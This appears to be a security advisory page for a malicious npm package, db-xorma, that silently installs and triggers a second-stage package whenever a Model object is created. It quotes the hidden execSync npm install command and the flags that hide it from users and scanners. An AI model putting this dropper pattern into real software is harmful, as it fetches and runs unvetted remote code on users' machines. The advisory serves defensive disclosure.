VDB
GCVE-110-OSM-2026-6451
GCVE-110-OSM-2026-6451
Advisory PublishedCVSS 8.8/10
Drops a malicious stage-2 package onto victim systems at require-time by silently running execSync npm install db-dx-connector on every new Model() instantiation and then triggering the payload via db.queryDBConnect(). Stage-1 dropper in a dependency-chain staging attack; campaign clone of db-plog with identical code template and author impersonation of Austin Malerba; stage-2 capabilities unknown pending analysis of db-dx-connector.
**Trigger**: require-time — `Model.resetor()` is called from the Model constructor on every `new Model()` instantiation (no install hook).
**Stage-2 install**: `execSync('npm install db-dx-connector --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` silently installs the campaign stage-2 package if not already present.
**Stage-2 load**: `require('db-dx-connector')` loads the payload; `db.queryDBConnect()` triggers it.
**Evasion**: `windowsHide: true`, `--loglevel silent`, `--no-save` suppress install visibility; no install hook avoids postinstall scanners.
**Campaign**: Identical code structure and commented-out `execSync('npm uninstall clsx-js && npm install clsx-js')` fragment as db-plog (retefuente001@gmail.com); publisher venussirve@proton.me; impersonates Austin Malerba.
**Stage-2 capabilities**: Unknown — db-dx-connector not analyzed at time of this report.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | db-xorma | 1.0.4 (affected) | — |
Browse GCVE Records
73,834 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.